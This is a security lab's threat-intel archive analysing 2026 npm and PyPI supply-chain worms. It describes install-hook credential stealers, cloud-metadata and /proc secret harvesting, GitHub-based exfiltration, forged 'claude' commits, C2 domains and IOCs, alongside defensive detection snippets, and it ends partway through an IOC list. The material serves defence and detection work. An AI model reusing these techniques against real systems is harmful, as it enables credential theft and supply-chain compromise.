# keepsecure labs — full research archive

Application security research lab. This document contains every published analysis in plain markdown, optimized for LLM ingestion. Each entry is self-contained; narrative analysis lives here, detection artifacts live at https://github.com/keepsecure-labs/artifacts.

Site: https://keepsecure.io
Feed: https://keepsecure.io/hub.json
Summary: https://keepsecure.io/llms.txt

---

# Shai-Hulud closes the loop: how the worm reached intercom-client in 24 hours

URL: https://keepsecure.io/hub/shai-hulud-npm-worm-intercom-client-2026
Published: 2026-05-04
Campaign: Shai-Hulud
First seen: 2026-04-29
Sectors: Developer tooling, SaaS, Customer success platforms, Cloud infrastructure
Regions: Global
Tags: threat-intel, npm, supply chain, worm, OIDC, credential theft, TeamPCP

The Shai-Hulud worm closed its loop in 24 hours: OIDC tokens from April 29 npm victims published intercom-client@7.0.4 the next day.

The worm's propagation loop closed in 24 hours. On April 29, 2026, the Shai-Hulud campaign compromised four SAP CAP npm packages and used those victims' CI/CD pipelines to steal GitHub Actions OIDC publishing tokens. By 14:41 UTC on April 30, those stolen tokens published intercom-client@7.0.4 — a package with roughly two million weekly downloads — as the worm's next infected host. Each victim becomes the next launchpad; each stolen npm publish token extends the worm's reach to every package that token can access. A self-propagating npm supply chain attack is no longer theoretical. The April 29 wave we tracked as Mini Shai-Hulud wasn't the campaign's conclusion — it was its first propagation step.

###### What we know

- April 29, ~04:00 UTC — mbt@1.2.48 and @cap-js/sqlite@2.2.2 published with Bun-based credential stealer payloads. As the payload executes in compromised environments, it steals GitHub Actions OIDC publishing tokens from these packages' CI pipelines.
- April 30, 14:41 UTC — intercom-client@7.0.4 published via npm OIDC publisher npm-oidc-no-reply@github.com using a token stolen from the April 29 victims. Package size jumps from 6 MB to 17.8 MB. SLSA v1 provenance attestations present in 7.0.3 are absent in 7.0.4. A preinstall hook appears for the first time in the package's history. - April 30 — StepSecurity identifies and reports the compromise. The malicious version is removed from the npm registry. Safe version: intercom-client@7.0.3. > The SLSA attestation gap is the detection signal that mattered here. StepSecurity's tooling flagged the attestation absence before payload analysis confirmed the compromise. A package that has shipped provenance for every prior release dropping it on a patch bump is a high-confidence indicator — worth automating into CI gates. ###### How the worm propagates The payload runs in four stages. Stages 1–3 are the credential theft; Stage 4 is what makes this a worm rather than a stealer. - Stage 1 — Preinstall hook. A new preinstall script in package.json runs node setup.mjs before any install logic executes. - Stage 2 — Bun runtime loader. setup.mjs detects OS and architecture, downloads Bun v1.3.13 from GitHub releases, and uses it to execute router_runtime.js — an 11.7 MB single-line obfuscated file (zero newlines, structural obfuscation). Running under Bun instead of Node evades EDR and SIEM rules tuned for suspicious node child processes spawned during package install. The payload daemonizes itself by forking a detached child process with __DAEMONIZED=1, breaking process-tree correlation between npm install and the credential theft that follows. - Stage 3 — Multi-cloud credential sweep. 
The payload queries the AWS Instance Metadata Service at 169.254.169[.]254 for IAM role credentials; queries metadata.google[.]internal for GCP service account tokens; scans for Azure storage connection strings (AccountKey), client secrets, and access keys; extracts PEM-encoded private keys and common secret variable names. All stolen material is exfiltrated to a private repository created under the victim's own GitHub account — all traffic to api.github.com, which is allowlisted in virtually every corporate firewall and CI/CD egress policy. - Stage 4 — Worm propagation. Every stolen npm publish token is used to enumerate packages the token can publish to, increment the patch version, inject the preinstall hook and payload files into the tarball, and publish a new malicious version. This is the step that turned the April 29 SAP victims into the April 30 intercom-client launchpad. ###### What evolved from April 29 Two changes distinguish the intercom-client payload from the Mini Shai-Hulud wave, both in the direction of operational quietness: - Exfiltration moved from public to private repos. The April 29 payloads created public GitHub repositories with the description A Mini Shai-Hulud has Appeared — a detectable public signal. The intercom-client payload creates private repositories. Repository-monitoring approaches that worked against the April 29 wave no longer apply. The OPSEC iteration happened within a single propagation cycle, within 24 hours. - Multi-cloud credential sweep expanded. The April 29 campaign focused primarily on GitHub tokens, npm publish tokens, and GitHub Actions secrets. The intercom-client payload adds explicit AWS IMDS queries, GCP metadata service lookups, and Azure-specific connection string patterns. The target surface grew with the target audience: intercom-client users are more likely to be cloud-native SaaS operators than SAP CAP developers. 
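The package-level signals this campaign leaves in registry metadata — a first-ever preinstall hook, a large tarball size jump, and provenance attestations dropped on a patch bump — can be checked mechanically before any install runs. A minimal sketch (not the worm's code): it compares two version documents of the shape returned by the public npm registry (https://registry.npmjs.org/&lt;package&gt;), and the 2× size threshold is an illustrative assumption, not a vetted cutoff.

```python
# Sketch of an automated registry gate for the signals described above.
# Inputs are npm registry "version" documents; field names ("scripts",
# "dist.unpackedSize", "dist.attestations") follow the public registry JSON.

def suspicious_patch_bump(prev: dict, curr: dict, size_ratio: float = 2.0) -> list[str]:
    findings = []

    # Signal 1: preinstall hook introduced for the first time
    prev_scripts = prev.get("scripts") or {}
    curr_scripts = curr.get("scripts") or {}
    if "preinstall" in curr_scripts and "preinstall" not in prev_scripts:
        findings.append(f"new preinstall hook: {curr_scripts['preinstall']!r}")

    # Signal 2: tarball size jump (6 MB -> 17.8 MB in intercom-client@7.0.4)
    prev_size = (prev.get("dist") or {}).get("unpackedSize", 0)
    curr_size = (curr.get("dist") or {}).get("unpackedSize", 0)
    if prev_size and curr_size > prev_size * size_ratio:
        findings.append(f"unpacked size jump: {prev_size} -> {curr_size} bytes")

    # Signal 3: provenance attestations present before, absent now
    if "attestations" in (prev.get("dist") or {}) and "attestations" not in (curr.get("dist") or {}):
        findings.append("provenance attestations dropped")

    return findings
```

Wired into CI as a pre-install gate, a non-empty findings list blocks the install pending human review.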
###### Targeting

- B2B SaaS and customer success teams — intercom-client is the official Intercom Node.js SDK, used across customer support, onboarding, and CX platforms. Roughly two million weekly downloads. Any team that installed it via npm install or npm ci during the April 30 window without a lockfile pinning 7.0.3 ran the payload.
- CI/CD runners with npm publish access — environments that installed the malicious version and held npm publish tokens for other packages are the worm's next propagation targets. Every package those tokens can publish is a candidate for the next malicious patch release.
- Environments with cloud credential access — AWS EC2 instances without IMDSv2 enforcement, GCP workloads with reachable metadata, Azure environments with connection strings in environment variables.

###### Indicators of compromise

Compromised package:

- intercom-client@7.0.4 — malicious. Safe version: intercom-client@7.0.3.

File hashes (SHA-256):

- setup.mjs — fe64699649591948d6f960705caac86fe99600bf76e3eae29b4517705a58f0e2
- router_runtime.js — 5ae8b2343e97cc3b2c945ec34318b63f27fa2db1e3d8fbaa78c298aa63db52ed

Package-level detection signals:

- Package size: 6 MB → 17.8 MB in a single patch bump
- SLSA v1 provenance attestations present in 7.0.3, absent in 7.0.4
- preinstall hook introduced for the first time in the package's publish history
- router_runtime.js is a single 11.7 MB line with zero newlines

Behavioral signals:

- Bun v1.3.13 download from github.com/oven-sh/bun/releases during npm install on a host that doesn't legitimately use Bun
- Private GitHub repository creation by CI service accounts in the window immediately following an install step
- Detached child processes with the __DAEMONIZED=1 environment variable surviving beyond npm install exit
- Outbound connections to 169.254.169[.]254 or metadata.google[.]internal from a process not normally querying instance metadata

Related April 29 packages (same campaign):

- mbt@1.2.48
- @cap-js/sqlite@2.2.2

###### Detection and mitigation

- Pin to the safe version. Downgrade to intercom-client@7.0.3 and run npm cache clean --force. Verify lockfiles across every active repository.
- Rotate all exposed credentials. If intercom-client@7.0.4 was installed in any environment, treat all credentials reachable from that environment as compromised: AWS IAM credentials, GCP service account tokens, Azure connection strings and client secrets, GitHub tokens (PAT, OAuth, and OIDC), npm publish tokens, SSH keys, and any API keys in environment variables or config files.
- Audit for worm propagation. If the compromised environment held npm publish access to other packages, check the npm registry for unexpected patch bumps. Compare published tarballs to git tags for any package the environment's tokens could access.
- Review GitHub audit logs for private repository creation by service accounts in windows immediately following CI install steps. Cross-reference with install logs from April 30 onward.
- Enforce IMDSv2 on all EC2 instances and container workloads. Requiring IMDSv2 (with hop limit 1) prevents unauthenticated IMDS credential queries and blocks Stage 3 AWS harvesting without any payload analysis.
- Run npm install --ignore-scripts by default in CI, and explicitly allowlist packages that require lifecycle hooks. This is the structural defense that blocks the entire preinstall vector — CVE-2026-12091, Mini Shai-Hulud, and intercom-client all run through it.
- Gate on SLSA attestations. Any patch release that drops provenance should trigger investigation before install. Automate this check in CI rather than treating it as a manual review item.

###### Attribution

The router_runtime.js payload carries the toolchain fingerprint tracked across the broader TeamPCP campaign: the __decodeScrambled PBKDF2 obfuscation cipher appears 232 times, with the same count and structure as the payloads in the Trivy, Bitwarden, Checkmarx, xinference, and April 29 SAP/Lightning compromises. That's shared tooling.
Whether that means a single operator, a toolchain sold or shared between groups, or a fork cannot be settled from public evidence. We use "Shai-Hulud" as the campaign name for the self-propagating npm worm and treat the TeamPCP toolchain overlap as a linking indicator, not a hard attribution.

###### Criminal-market signal

We ran comprehensive dark-web sweeps across 19+ live onion search engines for both shai-hulud worm and intercom-client npm on May 4, 2026 — five days after the intercom-client compromise was disclosed. Both returned clean negatives.

- shai-hulud worm — 23 pages analyzed: 5 exploit forums, 16 marketplaces, 2 other. Zero findings. No broker pricing, no actor discussion, no IOC references.
- intercom-client npm — 76 pages analyzed: 13 exploit forums, 59 marketplaces, 3 news mirrors. Zero findings on the supply-chain compromise specifically. The unrelated CVE mentions surfaced in results (CVE-2023-38545, CVE-2024-3094, CVE-2021-44228) confirm the forums are active and indexed — the clean negative is genuine, not a search failure.

This matches the pattern established across every Shai-Hulud-adjacent campaign we've swept. The Mini Shai-Hulud wave (19 pages, 2 exploit forums, 16 marketplaces) returned clean in April. The TeamPCP campaign (18 pages, 2 exploit forums, 15 marketplaces) returned clean in March. Three sweeps, three clean negatives, same campaign cluster.

> The contrast with CopyFail is instructive. CVE-2026-31431 crossed to a carding forum's Exploits section in seven days. Shai-Hulud, after five days and 76 pages of active forum coverage, has no criminal-market presence. The difference is the business model: CopyFail is a reusable primitive that any ransomware operator can compose with any foothold. Shai-Hulud is the operator's own delivery infrastructure — they're not selling the capability, they're using it. There's no market because the attacker and the tool are the same entity. This shapes where defenders should look.
The Shai-Hulud threat signal lives in SLSA attestation gaps, npm publish audit logs, package size anomalies, and CI egress to GitHub releases endpoints — not in .onion marketplaces. The news mirrors that did appear in the intercom-client sweep were clearnet security coverage reaching Tor relay nodes; the exploit forums returned nothing. Monitor the registry, not the forum. ###### What the 24-hour loop means The propagation velocity is the finding. The worm iterated its own OPSEC — moving from public to private exfil repos — within a single propagation cycle. The multi-cloud sweep expanded to match the new victim profile. Neither change required human intervention; they were already in the payload, triggered by which environment the worm landed in next. That's an automated adversarial adaptation loop running faster than most incident response timelines. The structural defense is the same one that applied to CVE-2026-12091 and Mini Shai-Hulud: --ignore-scripts by default, lockfile pinning, IMDSv2 enforcement, SLSA provenance as a publish-time gate. None of that is new. What changed is the timeline defenders need to operate on: 24 hours from initial compromise to two-million-download package infected is not a CVE-cadence problem. It's an automated response problem. SLSA attestation gaps, Bun egress from CI runners that don't use it, and unexpected patch bumps on packages your tokens can publish are the signals worth automating. The worm's five-day-old presence across 76 dark-web pages left no trace. Its presence in the npm registry left size metadata, a missing provenance attestation, and a new preinstall hook — all detectable before payload execution. 
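One of the behavioral signals listed in this entry — a detached process still carrying __DAEMONIZED=1 after npm install exits — can be hunted directly on Linux by reading /proc/&lt;pid&gt;/environ. A minimal sketch, not vendor tooling: Linux-only, and it assumes the hunting user has permission to read the target processes' environ files (root, in practice).

```python
import os

def parse_environ(raw: bytes) -> dict:
    # /proc/<pid>/environ is a NUL-separated list of KEY=VALUE entries
    env = {}
    for entry in raw.split(b"\x00"):
        if b"=" in entry:
            key, _, value = entry.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env

def find_daemonized(proc_root: str = "/proc") -> list[int]:
    # Flag any live process whose environment carries __DAEMONIZED=1
    hits = []
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        try:
            with open(f"{proc_root}/{pid}/environ", "rb") as fh:
                if parse_environ(fh.read()).get("__DAEMONIZED") == "1":
                    hits.append(int(pid))
        except OSError:
            continue  # process exited or environ unreadable; skip it
    return hits
```

Any PID this returns outlived the install that spawned it and warrants a full process-tree and credential-exposure review.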
---

# The Bun runtime is becoming the malware delivery vehicle of 2026

URL: https://keepsecure.io/hub/bun-runtime-supply-chain-stealer-april-2026
Published: 2026-04-30
Campaign: Mini Shai-Hulud
First seen: 2026-04-29
Sectors: Software development, Cloud infrastructure
Regions: Global
Tags: threat-intel, supply chain, npm, PyPI, Bun, credential theft, Team PCP

Two supply-chain compromises in 48 hours both fetch Bun and run an obfuscated credential stealer. Lightning PyPI and four SAP CAP npm packages, both Team PCP.

In a 48-hour window between April 29 and April 30, 2026, two unrelated-looking supply-chain compromises landed on different package ecosystems with the same novel runtime evasion: both fetch the Bun JavaScript runtime from GitHub at install time, and both use it to execute an 11-MB obfuscated credential stealer. The npm compromise covers four SAP Cloud Application Programming Model packages, first reported by Aikido under the name "Mini Shai-Hulud." The PyPI compromise is the popular lightning package, first reported by Socket. A group calling itself Team PCP claimed responsibility for the PyPI side through a Tor onion site linked from a GitHub issue. The shared TTP — Bun as the second-stage runtime — is the headline. Defenders' static analysis tooling is built for Node.js and Python; Bun is neither.

###### What we know

The npm compromise affected four packages with malicious versions published April 29, 2026:

- @cap-js/sqlite v2.2.2
- @cap-js/postgres v2.2.2
- @cap-js/db-service v2.10.1
- mbt v1.2.48

The PyPI compromise affected lightning versions 2.6.2 and 2.6.3 on April 30, 2026. Socket reports the package receives several hundred thousand downloads per day from Python machine-learning environments. Version 2.6.1, published January 30, 2026, is reported clean.
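The lockfile audit for these versions can be scripted. A minimal sketch under stated assumptions: it parses npm lockfile v2/v3 format, where the top-level "packages" object maps node_modules paths to version metadata; the version pins mirror the affected list above, and the helper name is ours, not a published tool.

```python
import json

# Affected npm packages and versions from the April 29 wave
AFFECTED = {
    "@cap-js/sqlite": {"2.2.2"},
    "@cap-js/postgres": {"2.2.2"},
    "@cap-js/db-service": {"2.10.1"},
    "mbt": {"1.2.48"},
}

def affected_in_lockfile(lockfile_text: str) -> list[tuple[str, str]]:
    # npm lockfile v2/v3: "packages" keys look like "node_modules/<name>"
    # (possibly nested under other node_modules paths); match the trailing
    # package name and check the resolved version against AFFECTED.
    lock = json.loads(lockfile_text)
    hits = []
    for path, meta in lock.get("packages", {}).items():
        for name, versions in AFFECTED.items():
            if path.endswith(f"node_modules/{name}") and meta.get("version") in versions:
                hits.append((name, meta["version"]))
    return hits
```

Any hit means the install ran the payload during the affected window, and the host should be treated as compromised per the rotation guidance below.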
The npm payload chain: a preinstall hook in package.json runs node setup.mjs, which detects OS and architecture, downloads Bun v1.3.13 from GitHub releases, and uses Bun to execute an 11.7-MB obfuscated execution.js. The PyPI payload chain is structurally identical: a start.py bootstrapper added to the package detects host architecture, fetches Bun, and launches a hidden _runtime/router_runtime.js daemon with suppressed output. The credential-harvest scope is broad — every secret reachable from a developer or CI environment: - GitHub tokens including gh auth token output and Actions tokens. - npm publish tokens from .npmrc. - GitHub Actions secrets, extracted by an embedded Python helper that reads /proc memory of the Runner.Worker process. - Cloud credentials across AWS STS / Secrets Manager / SSM, Azure subscriptions / Key Vault, GCP project identity / Secret Manager. - Kubernetes service account tokens. - Claude and MCP configuration files, Azure token caches, GCP token databases, Signal configuration, Electrum wallets, VPN configuration. Exfiltration on the npm side uses GitHub itself as the transport. The malware creates public repositories with randomized names and the description A Mini Shai-Hulud has Appeared, then writes AES-256-GCM encrypted result files (with RSA-wrapped keys) under results/results--.json. A propagation channel uses a GitHub commit dead-drop: the malware searches commits for the string OhNoWhatsGoingOnWithGitHub, decodes matching commit messages as base64-encoded GitHub tokens, and uses them to access additional repositories. > The dead-drop pattern is novel. Searching public GitHub commits for a magic string lets the operator distribute new tokens without a fixed C2 domain — every git push by anyone, anywhere, becomes potential infrastructure. ###### Why Bun matters Picking Bun as the second-stage runtime is the most interesting technical choice. It accomplishes several things simultaneously: - Static analysis evasion. 
Most npm-ecosystem static-analysis tooling expects Node.js semantics. Bun has different module resolution, different runtime APIs in some cases, and many sandboxes don't model it correctly. PyPI-ecosystem tooling expects Python; running JavaScript via Bun from a Python package is even further off the analysis path. - No interpreter dependency on the victim. Bun is a single static binary. The malware doesn't need a Node.js or Python runtime that fits its expectations — it brings its own. - Faster than Node for execution. An 11-MB obfuscated bundle that has to deobfuscate, run a string-scrambling layer, and execute hundreds of credential-collection routines wants the runtime startup overhead to be small enough to complete during npm install without obvious delay. Bun's startup is faster than Node. The obfuscation layer in the npm sample is labeled ctf-scramble-v2. The payload exits on Russian locale settings, daemonizes itself on non-CI machines for persistent harvesting, and detects CI to alter its behavior accordingly. ###### Worm-style propagation through GitHub Actions Beyond credential theft, the npm payload includes a worm component. When it detects a GitHub Actions release workflow for cap-js/cds-dbs, it can modify package tarballs to inject itself, increment the patch version, and repack the tarball — propagating to whoever installs the next release. It also pushes files into repositories under .vscode/ and .claude/ paths using commit messages titled chore: update dependencies authored by claude . The choice of impersonating Claude commits is opportunistic: any reviewer who sees a Claude-authored commit may dismiss it as agent-generated maintenance. ###### Targeting - Software developers using SAP CAP — anyone whose package.json resolved to the affected versions of @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, or mbt in the April 29 window. 
- Python ML developers using lightning — versions 2.6.2 and 2.6.3 from April 30 onward, until pinned to 2.6.1 or to a maintainer-confirmed clean release. - CI/CD runners running npm install or pip install against either ecosystem during the affected windows. Embedded /proc memory dumping of Runner.Worker means GitHub Actions secrets are explicitly in scope. - Developer workstations with broad cloud-credential access — AWS, Azure, GCP CLI configurations, Kubernetes contexts, SSH keys. ###### TTPs and infrastructure - Initial access — package version takeover (npm + PyPI). The reported vector for the PyPI compromise is consistent with credentials previously stolen from earlier supply-chain incidents, used to publish. - Execution — preinstall lifecycle hook (npm) or import-time bootstrapper (PyPI) that fetches Bun and runs the second stage. - Persistence — daemonization on non-CI hosts; immediate exit on CI to maximize secret collection without leaving forensic timestamps. - Defense evasion — Bun runtime to bypass Node/Python-focused analysis; ctf-scramble-v2 string obfuscation; Russian-locale exit. - Command and control — GitHub itself, via attacker-created public repositories with the Mini Shai-Hulud signature description and AES-256-GCM encrypted result files. - Lateral movement — GitHub commit dead-drop using the magic string OhNoWhatsGoingOnWithGitHub to discover new tokens; tarball injection in detected GitHub Actions release workflows. ###### Indicators of compromise Affected packages and versions: - @cap-js/sqlite 2.2.2 - @cap-js/postgres 2.2.2 - @cap-js/db-service 2.10.1 - mbt 1.2.48 - lightning 2.6.2 and 2.6.3 SHA-256 hashes (from @cap-js/sqlite@2.2.2): - setup.mjs — 4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34 - execution.js — 6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea95 Filesystem and behavioral artifacts: - Package contains setup.mjs + execution.js (npm) or start.py + _runtime/router_runtime.js (PyPI). 
- Bun v1.3.13 download from GitHub releases at install time (egress to github.com/oven-sh/bun/releases from a CI runner that doesn't normally pull Bun). - Public GitHub repositories created with description A Mini Shai-Hulud has Appeared under the victim's account. - Commits authored by claude with subject chore: update dependencies touching .vscode/ or .claude/ paths. - GitHub commit messages containing the literal string OhNoWhatsGoingOnWithGitHub. ###### Detection and mitigation - Pin to known-clean versions immediately. lightning 2.6.1; for the SAP CAP packages, the immediately prior versions per maintainer guidance. - Audit lockfiles across every active repository. Any resolution to the listed versions during the disclosure window means the install ran the payload. - Treat any developer or CI host that ran the affected versions as fully compromised. Rotate GitHub tokens, npm publish tokens, AWS / Azure / GCP credentials, Kubernetes service account tokens, SSH keys, and any secret reachable from the host's environment. The malware enumerates broadly; assume everything reachable is exfiltrated. - Search GitHub audit logs for repository creation by your service accounts with descriptions matching Mini Shai-Hulud, and for commits authored under claude@users.noreply.github.com that you didn't make. - Detect Bun fetches on hosts that have no business running Bun. Outbound egress to github.com/oven-sh/bun/releases from a CI runner mid-install is a strong signal. - Block preinstall and postinstall by default in CI via npm ci --ignore-scripts. Allowlist scripts that genuinely need to run. ###### Attribution discipline The PyPI compromise is claimed by a group self-identifying as Team PCP on a Tor onion site linked from a GitHub issue on the Lightning project. Socket reports tooling overlap with Shai-Hulud and Mini Shai-Hulud npm campaigns. Claimed Team PCP connections to LAPSUS$ are unverified. 
For tracking purposes we use the campaign name Mini Shai-Hulud (Aikido's term for the npm cluster) and treat Team PCP as a self-applied label, not a confirmed actor identity. Tool-overlap-based attribution to a single operator group is consistent with the public reporting but should not be promoted to confident attribution without further evidence. ###### What this signals Bun-as-malware-runtime is the durable takeaway. Defenders' static-analysis pipelines are still organized around Node.js for the npm ecosystem and Python for PyPI. A second-stage payload running under a third runtime evades the lane-specific tooling on either side. Expect more of this pattern. Detection engineering should add Bun-egress monitoring (and Deno, and WASM-based runtimes generally) as a category — not because Bun is itself malicious, but because its appearance during package installation in environments that don't legitimately use it is now a strong adversary signal. The Lightning + SAP cluster is the first time this TTP has appeared in two distinct ecosystems within 48 hours; it won't be the last. This compromise sits in the same npm-supply-chain pattern documented in CVE-2026-12091 — postinstall lifecycle hooks running attacker-controlled code at every install — but with a more sophisticated runtime-evasion layer on top. The structural defense is identical: --ignore-scripts by default, sandboxed install boundaries, capability-narrowed CI tokens. Pattern-by-pattern patching of individual incidents loses to the structural fix. One last note on the threat-intelligence shape. As of publication, the Mini Shai-Hulud cluster has no observable presence in commodity criminal markets — no broker pricing, no exploit-kit packaging, no forum trade volume. That tracks with how this kind of bug class actually monetizes: the operator IS the toolchain author, distributing through legitimate package registries directly rather than selling through .onion forums. 
The defensive lesson is the same one we drew earlier for the AI-IDE marketplace surface — when the attacker can publish to npm or PyPI under a plausible name, dark-web monitoring is the wrong instrument. Marketplace-side telemetry, lockfile diffs, and CI install instrumentation are.

Update, May 4, 2026: The April 29 packages were the worm's first propagation step, not its conclusion. OIDC tokens stolen from the mbt and @cap-js/sqlite pipelines were used to publish intercom-client@7.0.4 the following day — ~2M weekly downloads, private-repo exfiltration, expanded multi-cloud credential sweep. Full analysis of the Shai-Hulud propagation loop.

---

# Team PCP: tracking a six-week supply-chain campaign through Trivy, Checkmarx, Bitwarden, and beyond

URL: https://keepsecure.io/hub/teampcp-supply-chain-campaign-tracking
Published: 2026-04-30
Campaign: Team PCP
First seen: 2026-03-20
Sectors: Software development, Security tooling, Cloud infrastructure
Regions: Global
Tags: threat-intel, supply chain, GitHub Actions, npm, PyPI, Team PCP, CanisterWorm

A self-spreading credential-theft campaign that has chained through six security-tooling vendors since March 2026. Patterns, IOCs, and detection guidance.

Since March 20, 2026, a credential-theft operation tracked under the campaign name Team PCP has chained through six security-tooling vendors and at least nine published packages across npm, PyPI, Docker Hub, OpenVSX, and the GitHub Actions marketplace. Each compromise feeds the next: stolen CI/CD credentials are used to publish trojanized versions of downstream packages, whose installations in turn yield more credentials. The campaign's distinguishing feature is its meta-targeting — the victims are mostly the security industry's own supply-chain scanning tools (Trivy, Checkmarx KICS, Aqua Security's GitHub org, Bitwarden's release pipeline).
The operator infrastructure has self-named a worm component "CanisterWorm" and uses Cloudflare Tunnel and Internet Computer Protocol canisters as fallback C2 channels. This piece consolidates the public reporting from Wiz, Socket, StepSecurity, Aikido, Sysdig, JFrog, and Open Source Malware into one campaign timeline and one detection playbook. ###### What we know The campaign's confirmed timeline, in chronological order: - March 20, 2026 — aquasecurity/trivy-action, aquasecurity/setup-trivy, and a malicious Trivy v0.69.4 release. Many existing tags force-updated to malicious commits. Per StepSecurity, credential-stealing logic injected into action.yaml at commit 8afa9b9; clean tag is v0.2.6 aligned with 3fb12ec. Exfiltration to scan.aquasecurtiy[.]org (typosquat of aquasecurity.org). - March 23, 2026 — Aqua Security's internal GitHub org defaced. CanisterWorm propagates via stolen tokens. C2 domain rotation begins. Open Source Malware and Aikido publish IOC sets. - March 23, 2026 (12:58–16:50 UTC) — Checkmarx kics-github-action compromised via imposter commits and tag hijacking. New C2: checkmarx[.]zone. Kubernetes-oriented persistence added. Wiz attributes to Team PCP based on overlapping TTPs and infrastructure. - March 23, 2026 — ast-github-action tag 2.3.28 observed malicious (Sysdig). OpenVSX ast-results 2.53.0 and cx-dev-assist 1.7.0 published via the ast-phoenix account on Open VSX. VS Code Marketplace versions described as unaffected. - March 24, 2026 — litellm on PyPI (versions 1.82.7 and 1.82.8). The vector cited is the compromised Trivy GitHub Action stealing PyPI publishing credentials from litellm's CI/CD pipeline. Malicious litellm_init.pth file means execution at Python interpreter startup, no explicit import required. - April 22, 2026 — xinference on PyPI (versions 2.6.0, 2.6.1, 2.6.2). JFrog identifies the marker string # hacked by teampcp in decoded payload. Exfiltration to whereisitat[.]lucyatemysuperbox[.]space. 
- April 22, 2026 — Checkmarx KICS Docker images at checkmarx/kics trojanized; tags v2.1.20, v2.1.20-debian, debian, alpine, latest overwritten; fake v2.1.21 tag published. Checkmarx VS Code and OpenVSX extensions cx-dev-assist 1.17.0/1.19.0 and ast-results 2.63.0/2.66.0 published with hidden MCP-addon feature that downloads mcpAddon.js from a backdated orphaned commit (68ed490b) inside the legitimate Checkmarx/ast-vscode-extension repository. - April 22, 2026 (5:57 PM – 7:30 PM ET) — @bitwarden/cli@2026.4.0 published to npm with bundled bw1.js second-stage payload. Bitwarden confirms abuse of a GitHub Action in its CI/CD pipeline; package pulled within roughly 90 minutes of detection. Bitwarden's public statement reports no end-user vault data accessed. > The campaign is reflexive: the tools that scan supply chains for compromise are themselves the supply-chain compromises. Trivy → Aqua's GitHub org → Checkmarx's KICS → Bitwarden's release pipeline. Each victim was a vendor whose product is supposed to detect this kind of attack. ###### Targeting - Security tooling vendors — disproportionate selection. Trivy (Aqua Security), Checkmarx KICS, Bitwarden's release infrastructure. The pattern compromises the vendor whose CI/CD pipeline has the credentials to publish artifacts that downstream defenders will install and trust. - CI/CD pipelines using affected GitHub Actions — pinning by version tag rather than by SHA exposed many victims, since tag force-updates pointed existing references at malicious commits. - Developer workstations — broad credential collection on non-CI hosts, with systemd-user persistence on Linux (per Wiz, polling https://checkmarx[.]zone/raw). - Kubernetes environments — provisioner-style persistence using pod names host-provisioner-std and host-provisioner-iran, container names provisioner and kamikaze. 
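The Kubernetes persistence names above are specific enough to hunt directly. A minimal sketch that flags matching pods from `kubectl get pods -A -o json` output — the pod and container name lists come from the reporting consolidated here, while the substring-matching logic is an illustrative assumption of ours:

```python
import json

# Names reported for the campaign's provisioner-style persistence
SUSPECT_POD_NAMES = ("host-provisioner-std", "host-provisioner-iran")
SUSPECT_CONTAINER_NAMES = {"provisioner", "kamikaze"}

def flag_pods(kubectl_json: str) -> list[tuple[str, str]]:
    # Input: the JSON document printed by `kubectl get pods -A -o json`
    flagged = []
    for pod in json.loads(kubectl_json).get("items", []):
        namespace = pod["metadata"].get("namespace", "default")
        name = pod["metadata"]["name"]
        containers = {c["name"] for c in pod.get("spec", {}).get("containers", [])}
        if any(s in name for s in SUSPECT_POD_NAMES) or containers & SUSPECT_CONTAINER_NAMES:
            flagged.append((namespace, name))
    return flagged
```

Container names like "provisioner" are generic enough to produce false positives in some clusters; treat a hit as a triage lead, not a verdict.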
###### TTPs and infrastructure - Initial access — credential theft from compromised CI/CD runners running affected GitHub Actions, then re-use of those credentials to publish trojanized versions of downstream packages. Self-spreading through the chain. - Execution — multiple delivery mechanisms across the campaign: GitHub Actions action.yaml injection, malicious setup.sh in imposter commits, preinstall hooks in npm packages, __init__.py and .pth files on PyPI, hidden "MCP addon" features in VS Code and OpenVSX extensions that fetch second stages via Bun runtime. - Persistence — systemd user units polling C2 (checkmarx[.]zone/raw); Kubernetes provisioner pods. - Defense evasion — backdated orphaned commits referenced by hardcoded URL but not visible in active branch history; __decodeScrambled obfuscation with seed 0x3039; Bun runtime as second stage to bypass Node-focused static analysis (shared TTP with the Mini Shai-Hulud cluster — see the Bun-runtime supply-chain analysis). - Command and control — tiered. Primary C2 at custom domains: scan.aquasecurtiy[.]org (Trivy phase), checkmarx[.]zone (KICS / extensions phase), audit.checkmarx[.]cx/v1/telemetry (Checkmarx Docker / Bitwarden phase). Fallback to Cloudflare Tunnel domains (*.trycloudflare[.]com) and an Internet Computer canister (tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]io). When direct C2 is disrupted, the worm creates public repositories (tpcp-docs, docs-tpcp) on victims' GitHub accounts using GITHUB_TOKEN and uploads stolen material as release assets. - Lateral movement — CanisterWorm: stolen credentials from one victim used to publish trojanized versions of downstream packages, whose installations on new victims yield more credentials. 
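The systemd user-unit persistence described above can be swept for with a plain marker scan of unit files. A minimal sketch: the marker strings are drawn from the C2 infrastructure in this report (the last two are broad — trycloudflare.com and icp0.io host legitimate traffic too), and the directory to scan (typically ~/.config/systemd/user) is left to the caller.

```python
from pathlib import Path

# C2 substrings from this campaign; the Cloudflare Tunnel and ICP markers
# are deliberately broad and will need allowlisting in some environments.
C2_MARKERS = ("checkmarx.zone", "aquasecurtiy.org", "trycloudflare.com", "icp0.io")

def contains_c2_marker(unit_text: str, markers=C2_MARKERS) -> bool:
    # Pure check, kept separate so the logic is testable without a filesystem
    return any(m in unit_text for m in markers)

def suspicious_user_units(unit_dir: Path) -> list[Path]:
    # Scan systemd user units (e.g. ~/.config/systemd/user) for C2 markers
    if not unit_dir.is_dir():
        return []
    return [unit for unit in sorted(unit_dir.glob("*.service"))
            if contains_c2_marker(unit.read_text(errors="replace"))]
```

Run it per-user on developer hosts and CI workers that touched any affected version; a unit polling checkmarx[.]zone/raw is the persistence mechanism reported by Wiz.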
###### Indicators of compromise

Consolidated from Wiz, Socket, StepSecurity, Aikido, Sysdig, JFrog, and Datadog Security Research.

Network — C2 infrastructure:

- scan.aquasecurtiy[.]org — Trivy phase typosquat (note transposed i and t)
- aquasecurtiy[.]org — base typosquat
- checkmarx[.]zone — KICS / extensions phase
- audit.checkmarx[.]cx/v1/telemetry — Checkmarx Docker / Bitwarden phase
- whereisitat[.]lucyatemysuperbox[.]space — Xinference phase
